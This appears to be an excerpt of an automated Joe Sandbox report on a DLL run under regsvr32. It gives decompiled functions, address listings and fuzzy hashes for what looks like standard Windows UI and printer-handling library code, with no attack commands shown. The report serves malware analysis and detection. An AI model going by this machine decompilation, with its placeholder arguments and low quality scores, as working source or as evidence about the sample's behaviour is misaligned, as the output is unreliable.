                                                                              0x100383f1
                                                                              0x10038404
                                                                              0x100383d7
                                                                              0x100383d7
                                                                              0x100383ea
                                                                              0x100383ea
                                                                              0x1003840c
                                                                              0x1003840f
                                                                              0x10038417
                                                                              0x10038420
                                                                              0x10038429
                                                                              0x10038429
                                                                              0x10038432
                                                                              0x10038438
                                                                              0x1003843a
                                                                              0x1003843f
                                                                              0x1003843f
                                                                              0x10038448
                                                                              0x10038455
                                                                              0x10038455
                                                                              0x10038463

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$EnableFocus$EnabledHookUnhookWindowslstrlen
                                                                              • String ID:
                                                                              • API String ID: 1607871872-0
                                                                              • Opcode ID: 67668aa80e0b489bc27a54671630ba2d453475744a35c988707f0fb17bd595ce
                                                                              • Instruction ID: 7571872faf02cc6112d61b666dc1b721ee06490c8acfe93bd9cf1410681c99e2
                                                                              • Opcode Fuzzy Hash: 67668aa80e0b489bc27a54671630ba2d453475744a35c988707f0fb17bd595ce
                                                                              • Instruction Fuzzy Hash: 9A314D36701A8086EA4ADB26D9543AC7364F7C8FD6F198061DE0E5B721DF79D996C300
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10008350 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 43%
                                                                              			E10008350(signed int __ecx, void* __edx, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r11, long long __r12, long long __r13) {
				long long _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v56;
				char _v64;
				intOrPtr _v72;
				intOrPtr _t33;
				void* _t36;
				signed int _t42;
				signed int _t49;
				long long _t52;
				void* _t67;
				long long* _t74;

				_t52 = __rax;
				_v8 = __rbx;
				_v16 = __rsi;
				_v24 = __rdi;
				_v32 = __r12;
				_v40 = __r13;
				_t67 = __rcx;
				_t42 = 0;
				_v64 = __rbx;
				E1000A57C(0, __ecx, __edx, r8d, __rax, __r8, __r9, __r11);
				_t33 = E100094BC(__rax,  &_v64);
				r12d = _t33;
				_v72 = _t33;
				_v56 = __rbx;
				if(_t33 != 0) {
					if( *((long long*)(_t67 + 0xa8)) == 0) {
						if( *((long long*)(_t67 + 8)) == 0) {
							GetModuleHandleW();
							 *((long long*)(_t67 + 8)) = __rax;
							if(__rax == 0) {
								LoadLibraryW();
								 *((long long*)(_t67 + 8)) = __rax;
								 *((char*)(_t67 + 0x10)) = __ecx & 0xffffff00 | __rax != 0x00000000;
							}
						}
						GetProcAddress();
						 *((long long*)(_t67 + 0xa8)) = _t52;
					}
					_t74 =  *((intOrPtr*)(_t67 + 0xa8));
					if((_t42 & 0xffffff00 | _t74 != 0x00000000) == 0) {
						E10016544();
					}
					r8d = 0;
					_t36 =  *_t74();
					_v56 = _t52;
					if(r12d != 2) {
						_t49 = _t42;
						dil = _t52 == 0;
						if(_t49 != 0) {
							_t42 = GetLastError();
						}
						_t36 = E100094A0(_t52);
						if(_t49 != 0) {
							SetLastError();
						}
					}
				} else {
					_t36 = 0;
				}
				return _t36;
			}


















                                                                              0x10008350
                                                                              0x10008354
                                                                              0x10008359
                                                                              0x1000835e
                                                                              0x10008363
                                                                              0x10008368
                                                                              0x10008373
                                                                              0x10008376
                                                                              0x10008378
                                                                              0x1000837d
                                                                              0x1000838e
                                                                              0x10008393
                                                                              0x10008396
                                                                              0x1000839a
                                                                              0x100083a1
                                                                              0x100083b2
                                                                              0x100083b9
                                                                              0x100083bf
                                                                              0x100083c5
                                                                              0x100083cc
                                                                              0x100083d2
                                                                              0x100083d8
                                                                              0x100083e2
                                                                              0x100083e2
                                                                              0x100083cc
                                                                              0x100083f0
                                                                              0x100083f6
                                                                              0x100083f6
                                                                              0x100083fd
                                                                              0x1000840e
                                                                              0x10008410
                                                                              0x10008410
                                                                              0x10008415
                                                                              0x1000841d
                                                                              0x10008423
                                                                              0x1000842c
                                                                              0x1000842e
                                                                              0x10008433
                                                                              0x10008439
                                                                              0x10008441
                                                                              0x10008441
                                                                              0x1000844a
                                                                              0x10008451
                                                                              0x10008455
                                                                              0x10008455
                                                                              0x10008451
                                                                              0x100083a3
                                                                              0x100083a3
                                                                              0x100083a3
                                                                              0x1000847b

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressHandleLibraryLoadModuleProc
                                                                              • String ID: ImageList_GetIcon
                                                                              • API String ID: 1454160851-3623868649
                                                                              • Opcode ID: 165aa2e81951261ce78a446e5cf25994187b22a0eda1c443012cef2869469937
                                                                              • Instruction ID: 9fbf5d24e7adf771bd0e8bbcdf8f088e9b870b2a6a4caa693d1975677e805ebb
                                                                              • Opcode Fuzzy Hash: 165aa2e81951261ce78a446e5cf25994187b22a0eda1c443012cef2869469937
                                                                              • Instruction Fuzzy Hash: AC313836204B8192E754CB25E88034AB3A4FB89BD4F554029EADD83B18EF78D5A4CB01
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 100081D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 43%
                                                                              			E100081D0(signed int __ecx, void* __edx, void* __esi, long long __rax, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, void* __r11, long long __r12) {
				long long _v8;
				long long _v16;
				long long _v24;
				long long _v32;
				char _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _t32;
				intOrPtr _t35;
				signed int _t42;
				signed int _t49;
				intOrPtr _t51;
				long long _t64;
				char* _t74;
				void* _t77;
				long long* _t84;

				_t64 = __rax;
				_v8 = __rbx;
				_v16 = __rsi;
				_v24 = __rdi;
				_v32 = __r12;
				_t77 = __rcx;
				_t42 = 0;
				_v48 = __rbx;
				E1000A57C(0, __ecx, __edx, __esi, __rax, __r8, __r9, __r11);
				_t74 =  &_v48;
				_t32 = E100094BC(__rax, _t74);
				r12d = _t32;
				_v52 = _t32;
				_v56 = 0;
				if(_t32 == 0) {
					L14:
					return _t32;
				}
				if( *((long long*)(_t77 + 0x70)) != 0) {
					L6:
					_t84 =  *((intOrPtr*)(_t77 + 0x70));
					if((_t42 & 0xffffff00 | _t84 != 0x00000000) == 0) {
						E10016544();
					}
					_t24 = _t74 - 6; // 0x1
					r8d = _t24;
					_t35 =  *_t84();
					_t51 = _t35;
					_v56 = _t35;
					if(r12d != 2) {
						_t49 = _t42;
						dil = _t35 == 0;
						if(_t49 != 0) {
							_t42 = GetLastError();
						}
						E100094A0(_t64);
						if(_t49 != 0) {
							SetLastError();
						}
					}
					_t32 = _t51;
					goto L14;
				}
				if( *((long long*)(_t77 + 8)) == 0) {
					GetModuleHandleW();
					 *((long long*)(_t77 + 8)) = __rax;
					if(__rax == 0) {
						LoadLibraryW();
						 *((long long*)(_t77 + 8)) = __rax;
						 *((char*)(_t77 + 0x10)) = __ecx & 0xffffff00 | __rax != 0x00000000;
					}
				}
				_t74 = "ImageList_SetOverlayImage";
				GetProcAddress(??, ??);
				 *((long long*)(_t77 + 0x70)) = _t64;
				goto L6;
			}



















                                                                              0x100081d0
                                                                              0x100081d4
                                                                              0x100081d9
                                                                              0x100081de
                                                                              0x100081e3
                                                                              0x100081eb
                                                                              0x100081ee
                                                                              0x100081f0
                                                                              0x100081f5
                                                                              0x100081fa
                                                                              0x10008206
                                                                              0x1000820b
                                                                              0x1000820e
                                                                              0x10008212
                                                                              0x10008218
                                                                              0x100082c9
                                                                              0x100082e1
                                                                              0x100082e1
                                                                              0x10008223
                                                                              0x1000826b
                                                                              0x1000826b
                                                                              0x10008279
                                                                              0x1000827b
                                                                              0x1000827b
                                                                              0x10008285
                                                                              0x10008285
                                                                              0x1000828c
                                                                              0x1000828f
                                                                              0x10008291
                                                                              0x10008299
                                                                              0x1000829b
                                                                              0x1000829f
                                                                              0x100082a5
                                                                              0x100082ad
                                                                              0x100082ad
                                                                              0x100082b6
                                                                              0x100082bd
                                                                              0x100082c1
                                                                              0x100082c1
                                                                              0x100082bd
                                                                              0x100082c7
                                                                              0x00000000
                                                                              0x100082c7
                                                                              0x1000822a
                                                                              0x10008230
                                                                              0x10008236
                                                                              0x1000823d
                                                                              0x10008243
                                                                              0x10008249
                                                                              0x10008253
                                                                              0x10008253
                                                                              0x1000823d
                                                                              0x10008256
                                                                              0x10008261
                                                                              0x10008267
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              • ImageList_SetOverlayImage, xrefs: 10008256
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$AddressHandleLibraryLoadModuleProc
                                                                              • String ID: ImageList_SetOverlayImage
                                                                              • API String ID: 1454160851-1503838343
                                                                              • Opcode ID: 21befb28951d9cad0b4a521c15a69b7a12ea764501c742c2b4f356087680000b
                                                                              • Instruction ID: 3983dade2046ceeb6839b62853ef8e63412c6786fd7752419c80a58c209c64b9
                                                                              • Opcode Fuzzy Hash: 21befb28951d9cad0b4a521c15a69b7a12ea764501c742c2b4f356087680000b
                                                                              • Instruction Fuzzy Hash: 28317636204F8183E715CB6AE94034E73A0FB89BD4F550129EB8D83B18EF78D9A5CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001363C Relevance: 10.6, APIs: 7, Instructions: 69windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 53%
                                                                              			E1001363C(void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags, void* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11) {
				signed int _t6;
				void* _t18;
				void* _t21;
				void* _t33;
				void* _t34;
				void* _t45;
				void* _t51;

				_t53 = __r11;
				_t51 = __r9;
				_t49 = __r8;
				_t44 = __rdx;
				_t33 = __rax;
				_t21 = __edi;
				_t19 = __edx;
				_t18 = __ebx;
				_t45 = __r8;
				r12d = __edx;
				E10013600(__esi, __rax, __rcx, __rdx, __r11);
				_t34 = __rax;
				_t6 = r12d & 0x0000fff0;
				r9d = _t6;
				r9d = r9d - 0xf040;
				if(r9d == 0) {
					L11:
					if(_t21 != 0x75 || _t34 == 0) {
						L15:
						return 0;
					} else {
						E100161E4(_t33, _t34);
						L14:
						return 1;
					}
				}
				r9d = r9d - 0x10;
				if(r9d == 0) {
					goto L11;
				}
				r9d = r9d - 0x10;
				if(r9d == 0 || r9d == 0xa0) {
					if(_t6 == 0xf060 || _t45 != 0) {
						if(_t34 != 0) {
							GetFocus();
							SetActiveWindow(??);
							E10011808(_t18, _t19, _t33, _t33, _t44, _t49, _t51, _t53);
							SendMessageW(??, ??, ??, ??);
							if(IsWindow(??) != 0) {
								SetActiveWindow();
							}
							if(IsWindow() != 0) {
								SetFocus();
							}
						}
					}
					goto L14;
				} else {
					goto L15;
				}
			}










                                                                              0x1001363c
                                                                              0x1001363c
                                                                              0x1001363c
                                                                              0x1001363c
                                                                              0x1001363c
                                                                              0x1001363c
                                                                              0x1001363c
                                                                              0x1001363c
                                                                              0x10013647
                                                                              0x1001364a
                                                                              0x10013650
                                                                              0x10013655
                                                                              0x1001365b
                                                                              0x10013660
                                                                              0x10013663
                                                                              0x1001366a
                                                                              0x10013700
                                                                              0x10013704
                                                                              0x1001371a
                                                                              0x00000000
                                                                              0x1001370b
                                                                              0x1001370e
                                                                              0x10013713
                                                                              0x00000000
                                                                              0x10013713
                                                                              0x10013704
                                                                              0x10013670
                                                                              0x10013674
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1001367a
                                                                              0x1001367e
                                                                              0x10013692
                                                                              0x1001369c
                                                                              0x100136a2
                                                                              0x100136af
                                                                              0x100136b8
                                                                              0x100136cc
                                                                              0x100136dd
                                                                              0x100136e2
                                                                              0x100136e2
                                                                              0x100136f3
                                                                              0x100136f8
                                                                              0x100136f8
                                                                              0x100136f3
                                                                              0x1001369c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ActiveFocus$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 1556911595-0
                                                                              • Opcode ID: f34434105fbe9312e5471eebf232c19cf86b1af8c65d97ec7c34c79593b32222
                                                                              • Instruction ID: cdbc8e2d321c3cd28a0b8b3c2365931e8dd691b903d69286f3b68882feba794b
                                                                              • Opcode Fuzzy Hash: f34434105fbe9312e5471eebf232c19cf86b1af8c65d97ec7c34c79593b32222
                                                                              • Instruction Fuzzy Hash: FD1160B6B1568195FB79DB62AC047E81794EB4AFD5F168030DD064BB91DE78C9C58300
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1001F154 Relevance: 10.6, APIs: 7, Instructions: 64windowkeyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSendState$DesktopFocusParentWindow
                                                                              • String ID:
                                                                              • API String ID: 4150626516-0
                                                                              • Opcode ID: dfdf18cb05db118a3abc410eb05678b18276bda056ff03e344cbff88631e963e
                                                                              • Instruction ID: 1a88cfb2c4c350ecbe902d5e8f123a992073737f6099ef8c0f1de337ff1f34f0
                                                                              • Opcode Fuzzy Hash: dfdf18cb05db118a3abc410eb05678b18276bda056ff03e344cbff88631e963e
                                                                              • Instruction Fuzzy Hash: C011257A30279442FA099B53BD087E5B2A1EB5DFD9F4A4434DD4A1B750EE38C8C68300
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1000ED54 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ClientRectScreen$DeferEqualParent
                                                                              • String ID:
                                                                              • API String ID: 443303494-0
                                                                              • Opcode ID: 5fa46f5cabbf1163ba72b00bdff0fa6b05bdf6268e22fc864e2c85444662ceca
                                                                              • Instruction ID: b08fae46a04c87e8d12156dc27fe215bfc6a8443975dfd93de8d5549499d4f58
                                                                              • Opcode Fuzzy Hash: 5fa46f5cabbf1163ba72b00bdff0fa6b05bdf6268e22fc864e2c85444662ceca
                                                                              • Instruction Fuzzy Hash: 17217C763046848BEB05CF26E954799B7A1FB89BC8F058024DF4A43B18DF38C8A5CF00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002C6A8 Relevance: 10.6, APIs: 7, Instructions: 56windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 37%
                                                                              			E1002C6A8(long long __rax, void* __rcx, void* __rdx) {
				void* _v72;
				intOrPtr _v88;
				int _t21;
				int _t29;
				void* _t31;
				void* _t32;
				long long _t39;
				void* _t40;
				intOrPtr _t45;
				void* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t51 = __rdx;
				_t39 = __rax;
				_t40 = __rcx;
				while(1) {
					r9d = 0xf;
					r8d = 0xf;
					_v88 = 0;
					if(PeekMessageW(??, ??, ??, ??, ??) == 0) {
						break;
					}
					r9d = 0xf;
					r8d = 0xf;
					_t21 = GetMessageW(??, ??, ??, ??);
					if(_t21 != 0) {
						DispatchMessageW();
						continue;
					}
					return _t21;
				}
				_t45 =  *((intOrPtr*)(_t40 + 0x70));
				 *((intOrPtr*)(_t40 + 0x80)) =  *((intOrPtr*)(_t45 + 0xe0));
				 *(_t40 + 0x88) =  *(_t45 + 0xdc) & 0x0000f000;
				SetRectEmpty(??);
				 *((intOrPtr*)(_t40 + 0x24)) = 0;
				 *((intOrPtr*)(_t40 + 0x20)) = 0;
				 *((intOrPtr*)(_t40 + 0x28)) = 0;
				 *((intOrPtr*)(_t40 + 0x8c)) = 0;
				 *((intOrPtr*)(_t40 + 0x90)) = 0;
				GetDesktopWindow();
				E10011808(_t32, 0, _t39, _t39, _t51, _t53, _t54, _t55);
				_t29 = LockWindowUpdate(??);
				r8d = 0x403;
				if(_t29 == 0) {
					_t18 = _t51 + 3; // 0x3
					r8d = _t18;
				}
				GetDCEx();
				_t31 = E1000C9E0(_t32, 0, _t39, _t39, _t51, _t53, _t54, _t55);
				 *((long long*)(_t40 + 0x98)) = _t39;
				return _t31;
			}
















                                                                              0x1002c6a8
                                                                              0x1002c6a8
                                                                              0x1002c6af
                                                                              0x1002c6df
                                                                              0x1002c6e4
                                                                              0x1002c6e7
                                                                              0x1002c6ec
                                                                              0x1002c6fc
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002c6be
                                                                              0x1002c6c1
                                                                              0x1002c6c6
                                                                              0x1002c6ce
                                                                              0x1002c6d9
                                                                              0x00000000
                                                                              0x1002c6d9
                                                                              0x1002c79c
                                                                              0x1002c79c
                                                                              0x1002c6fe
                                                                              0x1002c708
                                                                              0x1002c71d
                                                                              0x1002c723
                                                                              0x1002c729
                                                                              0x1002c730
                                                                              0x1002c737
                                                                              0x1002c73e
                                                                              0x1002c748
                                                                              0x1002c752
                                                                              0x1002c75b
                                                                              0x1002c767
                                                                              0x1002c775
                                                                              0x1002c77b
                                                                              0x1002c77d
                                                                              0x1002c77d
                                                                              0x1002c77d
                                                                              0x1002c781
                                                                              0x1002c78a
                                                                              0x1002c78f
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Window$DesktopDispatchEmptyLockPeekRectUpdate
                                                                              • String ID:
                                                                              • API String ID: 1192691108-0
                                                                              • Opcode ID: 18789949c5f8ef9a66f1c4d6ee48b2f8cb9b4676f58089ac199f5a965002314a
                                                                              • Instruction ID: 52b003659bf11993293af06185a3cde57799c0ae758badeb247b6926cff681e3
                                                                              • Opcode Fuzzy Hash: 18789949c5f8ef9a66f1c4d6ee48b2f8cb9b4676f58089ac199f5a965002314a
                                                                              • Instruction Fuzzy Hash: 6C2167767106858BEB10CF32E818B9937A0F788F88F858035CE4A8B754EF79C489CB10
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10024E70 Relevance: 10.6, APIs: 7, Instructions: 56memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalLock.KERNEL32 ref: 10024E8D
                                                                              • lstrcmpW.KERNEL32(?,?,?,?,?,?,100137B5), ref: 10024E9F
                                                                              • DocumentPropertiesW.WINSPOOL.DRV ref: 10024EF4
                                                                              • GlobalAlloc.KERNEL32 ref: 10024F01
                                                                              • GlobalLock.KERNEL32 ref: 10024F11
                                                                              • DocumentPropertiesW.WINSPOOL.DRV ref: 10024F35
                                                                              • ClosePrinter.WINSPOOL.DRV ref: 10024F5B
                                                                                • Part of subcall function 10029B10: GlobalFlags.KERNEL32 ref: 10029B1E
                                                                                • Part of subcall function 10029B10: GlobalUnlock.KERNEL32 ref: 10029B2E
                                                                                • Part of subcall function 10029B10: GlobalFree.KERNEL32 ref: 10029B3C
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreePrinter.Unlocklstrcmp
                                                                              • String ID:
                                                                              • API String ID: 992435789-0
                                                                              • Opcode ID: 28bb734ace8dcca2f434f1e277a410b7a14b770f34450f15de01bbd590c86c36
                                                                              • Instruction ID: 5a07c3b499bcea857dd3103964f43e79d4ffa498918c25349126464d8c437178
                                                                              • Opcode Fuzzy Hash: 28bb734ace8dcca2f434f1e277a410b7a14b770f34450f15de01bbd590c86c36
                                                                              • Instruction Fuzzy Hash: 9E11727630468182DB51CB61F96536E6364FB88FD8F464125EE4E4BB55DFA8C4448710
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10029E50 Relevance: 10.5, APIs: 7, Instructions: 35COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem$CapsDevice
                                                                              • String ID:
                                                                              • API String ID: 4163108049-0
                                                                              • Opcode ID: 61bbe3d38166c51850546c40c051e299c1f5d0697538b635a576acd884509a70
                                                                              • Instruction ID: 495c5c21212ffca4ae6114e00d694609e6fea7becb075a4bb7d5c2890360f818
                                                                              • Opcode Fuzzy Hash: 61bbe3d38166c51850546c40c051e299c1f5d0697538b635a576acd884509a70
                                                                              • Instruction Fuzzy Hash: 2B016971B4064087EB4A4F71ED1839932A1F74CB56F02843DCA8A87B90DFBC94D48F09
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10029DDC Relevance: 10.5, APIs: 7, Instructions: 27COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
